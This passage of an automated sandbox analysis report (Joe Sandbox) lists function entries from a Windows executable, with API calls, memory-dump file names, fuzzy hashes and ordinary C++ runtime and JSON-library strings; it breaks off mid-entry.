                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC571E3
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC57202
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC5722A
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC5723B
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC5724C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                          • Opcode ID: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
                                                                                                                                                                          • Instruction ID: 1f9e27968b72bf86e0a4f93b434dafcc9d98427252383ff4b65558ce45eb4b62
                                                                                                                                                                          • Opcode Fuzzy Hash: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
                                                                                                                                                                          • Instruction Fuzzy Hash: C0119D60B4F35241FA98B7699A81939A1925F547F0FC64336E83D0A7F7DE2CA5814230
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                          • Opcode ID: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
                                                                                                                                                                          • Instruction ID: a40dd66e1f075b86d3d4ebe29073395d35a8f9e816fc6a0489dc43b1c32e0c71
                                                                                                                                                                          • Opcode Fuzzy Hash: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
                                                                                                                                                                          • Instruction Fuzzy Hash: BB113960A8B30341FA98B36D85D1D7991D24F90770FDA0B79E93E0A2F7ED2CB5818231
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-3916222277
                                                                                                                                                                          • Opcode ID: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
                                                                                                                                                                          • Instruction ID: d42d4940c0dd509909854d1e5c0f1adb869a4289fcaa994e3744d2ad2ea8d734
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3BD1BF62E06B4280EB14FB69C444ABDE361EB05B98FD65132DE1D176BACF38D885D360
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                          • Opcode ID: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
                                                                                                                                                                          • Instruction ID: d731b2f33dff075445b3c8a0cebe515dff56eb5f0fa2389584d6887bd9354fa5
                                                                                                                                                                          • Opcode Fuzzy Hash: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
                                                                                                                                                                          • Instruction Fuzzy Hash: F2811572E4E24285FB657F2DC1D0A79F6A0EB10B44FD74271DA0E436B4DBADE8819321
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                          • Opcode ID: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
                                                                                                                                                                          • Instruction ID: d6a773652378825d7fbcaf767ff3655b045ca23dbea0c5814b4c52bb6fa5e7c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
                                                                                                                                                                          • Instruction Fuzzy Hash: C9810331E8E24285F7746A2D82D4E38ABE09F12748FD752B1C98E471B5DAADB8419321
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                          • Opcode ID: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
                                                                                                                                                                          • Instruction ID: 8a0994261ca1ec460e87137767cc3868b5cb79475f129e811b9dc60f655aa947
                                                                                                                                                                          • Opcode Fuzzy Hash: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
                                                                                                                                                                          • Instruction Fuzzy Hash: DB91AF73A09B818AE710DB68E4446ACBBB1FB45788F51413AEB8D07779DF38D291CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                          • String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
                                                                                                                                                                          • API String ID: 1944019136-3359747093
                                                                                                                                                                          • Opcode ID: 09134355286d258f424c871b66d32a5ec76972a8ea806c7188027cf1c95048a0
                                                                                                                                                                          • Instruction ID: 6ec547aaafd10ebbe61a7342ab72ded512e01540c40a68672722f2053573539d
                                                                                                                                                                          • Opcode Fuzzy Hash: 09134355286d258f424c871b66d32a5ec76972a8ea806c7188027cf1c95048a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9261E722F19B8142EA14EB19E550B79E361FB85784FC25131DA9D077B2DFBCE594C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                          • Opcode ID: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
                                                                                                                                                                          • Instruction ID: 635e1bc5c17a52df912cbf08dd86e2f4896683c30b641c845a537209d6b9a1b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
                                                                                                                                                                          • Instruction Fuzzy Hash: D651C331B1AA028ADB14EB19D448E3DB797EB44B98FA68130DA8A47774DF7CE941C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                          • Opcode ID: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
                                                                                                                                                                          • Instruction ID: 6ceb107e87769640a0326a71fa51e883e33640177f068ce7f3057b9da5532e75
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
                                                                                                                                                                          • Instruction Fuzzy Hash: A7514732A0974286EB30AF59C048B28B7A2FB40B84F968171DA4D477F9CF3CEA50C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                          • Opcode ID: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
                                                                                                                                                                          • Instruction ID: 2f2f85aaf1560351a06253cd1891979dad08f0a34bb086ca502f65968004d707
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
                                                                                                                                                                          • Instruction Fuzzy Hash: 09619132909BC581DB60AF19E4447AAB7A1FB84B84F454235EB8D03B79CF3CD294CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 2775327233-1405518554
                                                                                                                                                                          • Opcode ID: a698c5461aabfef6e2bb9a405ed0cbf50fc6a8d898b2ee4a9a538becd8a72348
                                                                                                                                                                          • Instruction ID: 14d796692f499408e69adee0fa01d5d7164389fab60caea87db829a682f858e3
                                                                                                                                                                          • Opcode Fuzzy Hash: a698c5461aabfef6e2bb9a405ed0cbf50fc6a8d898b2ee4a9a538becd8a72348
                                                                                                                                                                          • Instruction Fuzzy Hash: D1419F22B0BA41C9FB68EF79D491BBCB364EF44708F890035DE0D26A76CE38D5558324
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                          • API String ID: 3668304517-1866435925
                                                                                                                                                                          • Opcode ID: 1cb21ff558e73b4d3a28ad597b933c03072717efd9edd71730276d64137def7d
                                                                                                                                                                          • Instruction ID: 1dea0b5079489f25011719c3da933feaee285e903a182d48f6ade7fd03be7f56
                                                                                                                                                                          • Opcode Fuzzy Hash: 1cb21ff558e73b4d3a28ad597b933c03072717efd9edd71730276d64137def7d
                                                                                                                                                                          • Instruction Fuzzy Hash: BC519132B09B8185EB00EB28E4907A9B7A1FB84B84F918536DB8C47B79DF3CD545CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 2775327233-1405518554
                                                                                                                                                                          • Opcode ID: 70f948192818e844476bc654633a38caa76262b551cebd3f70368972ff52011b
                                                                                                                                                                          • Instruction ID: 133e278fe5a7bb4319f494748b527d5538c060e3e3588978064ba1e83e48dab5
                                                                                                                                                                          • Opcode Fuzzy Hash: 70f948192818e844476bc654633a38caa76262b551cebd3f70368972ff52011b
                                                                                                                                                                          • Instruction Fuzzy Hash: BF416A32B0BA41CAEB14EF78D491BEDA3A4EF44708F854434DA4D26A79CE38D5559324
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                          • Opcode ID: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
                                                                                                                                                                          • Instruction ID: bbfd1f69170ec859a6576a59a5ccf064baa8c7a9136f0463de13410767d17fa5
                                                                                                                                                                          • Opcode Fuzzy Hash: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED16632B09A5089E711DF78C580ABC77B5FB04B98B854236DE5D97BBADE38D146C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                          • Instruction ID: 8a0116b9f5072bc1521342c2bbf29741954c644537d3605baf95f72dc3d6cba6
                                                                                                                                                                          • Opcode Fuzzy Hash: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
                                                                                                                                                                          • Instruction Fuzzy Hash: D141D52290A686C6EB16EF28C4186BDBFA1EB05F84F8B8431C68C073B5CE3C9505C325
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 203985260-0
                                                                                                                                                                          • Opcode ID: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                          • Instruction ID: 70de50cf6248b12e729887e62dc12459778f1f082113ba1b7d75171aff0f781d
                                                                                                                                                                          • Opcode Fuzzy Hash: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E216D72A19B9287E3109F16E44472EF6B4F789B90FA50139EB8893B74CF3DD4458B10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileHandleInformationLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 275135790-0
                                                                                                                                                                          • Opcode ID: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                          • Instruction ID: e2b3008b41a9c360b586c6139b12004de5bb1f0e83e3a8c4ca6db8076f78609e
                                                                                                                                                                          • Opcode Fuzzy Hash: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0D131A1918382F7A86B78D454ABDE6A0DF41704FD60131C61A415B4DE2CEACC9B30
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
